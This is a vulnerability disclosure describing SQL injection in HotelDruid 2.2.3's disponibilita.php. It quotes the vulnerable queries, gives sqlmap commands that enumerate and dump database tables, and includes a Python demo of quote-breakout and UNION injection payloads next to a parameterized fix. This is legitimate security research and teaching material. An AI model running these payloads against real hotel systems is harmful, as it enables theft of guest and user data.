
HotelDruid 2.2.3: SQL Injection in disponibilita.php

📅 2026-01-15 📂 Vulnerability Discovery
Tags: SQLi, HotelDruid, Web Security, Database
TL;DR:
SQL injection vulnerability in HotelDruid 2.2.3 via unsanitized inizioperiodo and fineperiodo parameters in disponibilita.php, allowing full database extraction.

Summary

HotelDruid version 2.2.3 contains a SQL injection vulnerability in the disponibilita.php script. The application fails to properly sanitize or parameterize the inizioperiodo and fineperiodo input parameters before incorporating them into SQL queries. An attacker can exploit this by supplying specially crafted date strings that break out of the single-quoted string literals in the SQL statement, allowing the execution of arbitrary SQL commands.

Vulnerable Code

The vulnerability occurs in disponibilita.php because the inizioperiodo and fineperiodo variables, populated from request parameters ($_GET or $_POST) through the application's global-variable handling, are concatenated directly into SQL query strings:

Code 1 — disponibilita.php:180:

$idinizioperiodo = esegui_query("select idperiodi from $tableperiodi where datainizio = '$inizioperiodo' ");

Code 2 — disponibilita.php:184:

$idfineperiodo = esegui_query("select idperiodi from $tableperiodi where datafine = '$fineperiodo' ");

Both parameters are injected directly into the SQL query without any escaping, parameterization, or input validation.

Proof of Concept

The vulnerability can be exploited using sqlmap for automated extraction:

Table Enumeration

sqlmap -u 'http://localhost:8080/disponibilita.php?inizioperiodo=2026-01-01' --batch --tables

This reveals 36 tables including sensitive ones:

+---------------------+
| utenti              |
| clienti             |
| sessioni            |
| prenota2026         |
| privilegi           |
| transazioni         |
| soldi2026           |
| ...                 |
+---------------------+

Data Extraction

sqlmap -u 'http://localhost:8080/disponibilita.php?inizioperiodo=2026-01-01' --batch -T versioni --dump
Table: versioni [2 entries]
+------------+--------------+
| idversioni | num_versione |
+------------+--------------+
| 1          | 2.23         |
| 2          | 100.0        |
+------------+--------------+

Impact

A successful exploit allows an unauthenticated or authenticated attacker (depending on the instance configuration) to perform:

  • Data Extraction — Accessing sensitive information such as user credentials, guest data, and system configurations
  • Data Modification — Altering reservation records or user permissions
  • Data Deletion — Causing data loss or service disruption
  • System Compromise — In some configurations, this could lead to full control over the database server

Remediation

  • Use parameterized queries or prepared statements, so that inizioperiodo and fineperiodo are bound as values rather than spliced into the SQL text
  • Validate user-controlled parameters against an allow-list before use; for these two fields, reject anything that is not a well-formed YYYY-MM-DD date
  • Apply the principle of least privilege to the database account used by the application (no file-write or administrative privileges), which limits what an injection can reach
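The following is an added example, not HotelDruid code: it models the query shape from disponibilita.php against an in-memory SQLite database to show why the quote break-out works (a boolean clause that returns every period, and a UNION that pulls rows from an unrelated table, as the sqlmap dump above does), and places the hardened variant from the remediation list beside it. Table and column names are taken from the queries and dump on the page; the row contents of periodi are constructed, and the two versioni rows mirror the page's dump.

```python
import re
import sqlite3
from datetime import date

# Constructed sample data. Column names follow the vulnerable queries; rows are made up.
SAMPLE_PERIODS = [
    (1, "2026-01-01", "2026-01-01"),
    (2, "2026-01-02", "2026-01-02"),
    (3, "2026-01-03", "2026-01-03"),
]
# Mirrors the two rows shown in the sqlmap dump of the versioni table on the page.
SAMPLE_VERSIONI = [(1, "2.23"), (2, "100.0")]


def make_db():
    """Build an in-memory database standing in for the application's schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table periodi (idperiodi integer, datainizio text, datafine text)")
    conn.execute("create table versioni (idversioni integer, num_versione text)")
    conn.executemany("insert into periodi values (?, ?, ?)", SAMPLE_PERIODS)
    conn.executemany("insert into versioni values (?, ?)", SAMPLE_VERSIONI)
    return conn


def lookup_vulnerable(conn, inizioperiodo):
    """Same shape as the query on disponibilita.php:180: the value is spliced into a
    single-quoted literal, so a quote in the input ends the literal and the remainder
    is parsed as SQL."""
    sql = f"select idperiodi from periodi where datainizio = '{inizioperiodo}' "
    return [row[0] for row in conn.execute(sql)]


DATE_RE = re.compile(r"^\d{4}-\d{2}-\d{2}$")


def lookup_hardened(conn, inizioperiodo):
    """Hardened equivalent: allow-list validation (shape plus a real calendar date)
    and a bound parameter, so the input can never be interpreted as SQL."""
    if not DATE_RE.fullmatch(inizioperiodo):
        raise ValueError("inizioperiodo must be YYYY-MM-DD")
    date.fromisoformat(inizioperiodo)  # rejects 2026-13-45 and similar
    sql = "select idperiodi from periodi where datainizio = ?"
    return [row[0] for row in conn.execute(sql, (inizioperiodo,))]


def demo():
    """Run benign and injected inputs through both variants and collect the results."""
    conn = make_db()
    benign = "2026-01-02"
    # Closes the literal and appends an always-true clause; the trailing quote the
    # query itself supplies after the value closes the final '1'.
    boolean_payload = "x' or '1'='1"
    # Closes the literal and UNIONs in a column from another table, the same mechanism
    # sqlmap uses to dump versioni through the inizioperiodo parameter.
    union_payload = "x' union select num_versione from versioni where '1'='1"
    results = {
        "vuln_benign": lookup_vulnerable(conn, benign),
        "vuln_boolean": lookup_vulnerable(conn, boolean_payload),
        "vuln_union": sorted(lookup_vulnerable(conn, union_payload)),
        "hard_benign": lookup_hardened(conn, benign),
    }
    for name, payload in (("hard_boolean", boolean_payload), ("hard_union", union_payload)):
        try:
            lookup_hardened(conn, payload)
            results[name] = "accepted"
        except ValueError:
            results[name] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Both payloads end without a closing quote on purpose: the query template adds one after the interpolated value, and a payload that does not account for it produces a syntax error instead of a result. Validation alone (the regex) already stops both payloads here, but the bound parameter is what makes the query safe even if a future field cannot be constrained to a fixed format.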
